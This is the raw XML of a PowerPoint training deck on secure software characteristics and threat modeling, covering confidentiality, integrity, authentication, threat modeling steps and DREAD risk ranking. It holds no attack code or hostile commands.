            <a:off x="7581900" y="3766042"/>
            <a:ext cx="72390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02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57400"/>
            <a:ext cx="7924800" cy="1371601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Characteristics of a</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Secure Software</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>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06227" y="2362200"/>
            <a:ext cx="3531547" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10913"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246821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Secure Software Characteristics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclosure of information to only intended parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine whether the information is correct or not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controlled Access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72200" y="4724400"/>
            <a:ext cx="2362200" cy="15333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21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Secure Software Characteristics (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to Authorized People</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ready for Use when expected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non Repudiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Information Exchange with proof</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05600" y="4421111"/>
            <a:ext cx="1837716" cy="198913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43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Threat Modeling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13314" name="Picture 2" descr="http://www.anstechnology.net/wp-content/plugins/wp-portfolio/cache/45fc007c51dfe23d3b359a17c7525609_cd9a2dc97b928d83bf8db69dd721853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0" y="3352800"/>
            <a:ext cx="3048000" cy="2286001"/>
          </a:xfrm>
          <a:prstGeom prst="round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19475" y="228600"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Is Your Application “Secure”?</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1628775"/>
            <a:ext cx="8207375" cy="4895850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ever have anyone ask you this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There’s an easy answer: NO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are no “Secure” apps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But there are apps that are secure enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to achieve enough security?</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG"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86600" y="2514600"/>
            <a:ext cx="1219200" cy="157941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29412" y="2514600"/>
            <a:ext cx="714375" cy="69979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93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419475" y="228600"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>What Does “Secure Enough” Mean to You?</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1557338"/>
            <a:ext cx="8207375" cy="4824412"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nobody has an infinite security budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many folks would be happy if they had </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>budget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be practical!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get the most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>bang for your buck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="307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10400" y="5016500"/>
            <a:ext cx="1857375" cy="1403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69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Lectors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287480" y="1134607"/>
            <a:ext cx="3927073" cy="2101815"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nikolay Avramov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="357188" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Senior QA Engineer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="357188" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Sitefinity.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:b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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287480" y="3877806"/>
            <a:ext cx="3927073" cy="2101815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Atanas Atanasov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="357188" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>QA Engineer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="357188" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>CRM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="bg-BG" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>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803" y="4121639"/>
            <a:ext cx="1360257" cy="1370043"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>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33"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5447488" y="1448886"/>
            <a:ext cx="1526889" cy="1473255"/>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52039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Threat Modeling?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat modeling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A process for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>evaluating a software system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>security issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be considered as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>variation of formal reviews</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The review team looks for areas of the product's feature set that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>susceptible to security vulnerabilities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43563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419475" y="341313"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Threat Modeling Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1412875"/>
            <a:ext cx="8207375" cy="5111750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Threat modeling helps you find what is “secure enough”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What are you trying to protect?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Who is likely to attack you?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What avenues of attack exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Which vulnerabilities are the highest risk?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Go after the high risk vulnerabilities first!</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3791724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419475" y="341313"/>
            <a:ext cx="5565775" cy="877887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Approaches to Threat Modeling</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468313" y="1412875"/>
            <a:ext cx="8207375" cy="5111750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t have a security expert?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>Use Microsoft Patterns &amp; Practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t>Threat Modeling Web Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://msdn2.microsoft.com/en-us/library/ms978516.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="45000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" dirty="0"/>
              <a:t>Security guidance put together by well-known experts</a:t>
            </a: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15200" y="3048000"/>
            <a:ext cx="1255512" cy="1422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607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Modeling Steps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat modeling follows a few steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assemble the threat modeling team</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create an architecture overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decompose the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify the threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Document the threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rank the threats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2682464">
            <a:off x="6821961" y="2727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878419">
            <a:off x="6629400" y="4800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94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Ranking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threats are not equally important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A way to rank the threats is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DREAD formula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – using these criteria:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Damage potential</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reproducibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Affected Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discoverability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9825" y="3048000"/>
            <a:ext cx="4597376" cy="3419019"/>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37073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924800" cy="685800"/>
